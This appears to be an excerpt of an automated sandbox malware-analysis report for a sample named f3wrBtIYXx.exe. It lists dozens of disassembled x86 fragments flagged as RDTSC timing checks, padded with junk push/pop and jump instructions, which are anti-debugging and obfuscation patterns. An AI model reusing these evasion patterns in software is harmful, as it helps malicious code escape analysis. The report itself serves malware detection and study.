Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AB53 second address: 93AB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F5F64D1DAB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5F64D1DAC9h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AB7D second address: 93AB91 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F5F64D1DF1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACDC second address: 93ACE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACE0 second address: 93ACE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93ACE8 second address: 93AD1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 jnl 00007F5F64D1DAB6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5F64D1DABBh 0x00000019 jmp 00007F5F64D1DAC3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93AD1A second address: 93AD4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF25h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5F64D1DF22h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93B140 second address: 93B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DABAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FC95 second address: 93FC99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FC99 second address: 93FCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FCA3 second address: 93FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FE2D second address: 93FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FE35 second address: 93FE39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFA6 second address: 93FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFAC second address: 93FFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 93FFB0 second address: 93FFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7DF3 second address: 8E7DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7DF8 second address: 8E7E77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5F64D1DAB8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push edi 0x00000027 pop ecx 0x00000028 clc 0x00000029 mov ebx, dword ptr [ebp+1247BD6Fh] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F5F64D1DAB8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 00000016h 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov edi, dword ptr [ebp+122D2BB3h] 0x0000004f mov dx, 9B71h 0x00000053 add eax, ebx 0x00000055 push edx 0x00000056 adc ch, FFFFFF80h 0x00000059 pop ecx 0x0000005a nop 0x0000005b push edi 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7E77 second address: 8E7E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8E7E84 second address: 8E7E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94433A second address: 944342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439D1 second address: 9439E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5F64D1DAB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439E3 second address: 9439E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439E7 second address: 9439EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9439EF second address: 943A33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F5F64D1DF26h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F5F64D1DF2Ch 0x00000015 jmp 00007F5F64D1DF26h 0x0000001a jns 00007F5F64D1DF18h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A33 second address: 943A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A39 second address: 943A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A3D second address: 943A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943A47 second address: 943A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BA9 second address: 943BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BAD second address: 943BB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BB9 second address: 943BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 943BD3 second address: 943BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94404C second address: 944066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F5F64D1DABEh 0x0000000e jl 00007F5F64D1DAB6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 944066 second address: 94406C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94406C second address: 944070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C282 second address: 94C286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C286 second address: 94C29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C29B second address: 94C2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF25h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C2B8 second address: 94C2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94C2BE second address: 94C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5F64D1DF24h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5F64D1DF27h 0x00000015 jmp 00007F5F64D1DF23h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A49C second address: 94A4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A4A0 second address: 94A4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A7A1 second address: 94A7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94A7A5 second address: 94A7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AA63 second address: 94AA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AA72 second address: 94AA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AD1C second address: 94AD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5F64D1DAC9h 0x00000013 jmp 00007F5F64D1DABDh 0x00000018 jnl 00007F5F64D1DAB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94AD48 second address: 94AD4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B38B second address: 94B3AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jbe 00007F5F64D1DAB6h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3AF second address: 94B3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3B6 second address: 94B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F5F64D1DAC9h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F5F64D1DAB8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B3E6 second address: 94B406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF27h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94B995 second address: 94B9AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BF78 second address: 94BFA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 jmp 00007F5F64D1DF1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFA0 second address: 94BFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFA6 second address: 94BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jns 00007F5F64D1DF1Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 94BFC1 second address: 94BFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f jp 00007F5F64D1DAB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 954A08 second address: 954A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 953D4B second address: 953D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 953EF1 second address: 953EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 954451 second address: 95446D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jo 00007F5F64D1DAB8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9546FC second address: 95472E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF27h 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 960844 second address: 96084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 96084A second address: 960850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 960850 second address: 960855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95EFA1 second address: 95EFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F231 second address: 95F237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F237 second address: 95F23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F527 second address: 95F52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F918 second address: 95F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFED second address: 95FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFF3 second address: 95FFF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFF7 second address: 95FFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFFD second address: 96000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F5F64D1DF1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95E767 second address: 95E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95E76B second address: 95E771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 965C05 second address: 965C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 965DE1 second address: 965DF3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 96772F second address: 967748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5F64D1DAB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jno 00007F5F64D1DAB6h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 967748 second address: 96774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975C63 second address: 975C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975C6D second address: 975C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B20ED second address: 8B2105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC2h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2105 second address: 8B2148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF24h 0x00000016 jmp 00007F5F64D1DF1Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2148 second address: 8B214E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B214E second address: 8B2165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2165 second address: 8B2169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975672 second address: 975676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975676 second address: 975680 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9757C3 second address: 9757F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5F64D1DF21h 0x0000000b ja 00007F5F64D1DF16h 0x00000011 jng 00007F5F64D1DF16h 0x00000017 jmp 00007F5F64D1DF1Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9757F2 second address: 975806 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5F64D1DABCh 0x00000008 jo 00007F5F64D1DAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975806 second address: 975810 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AAE second address: 978AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
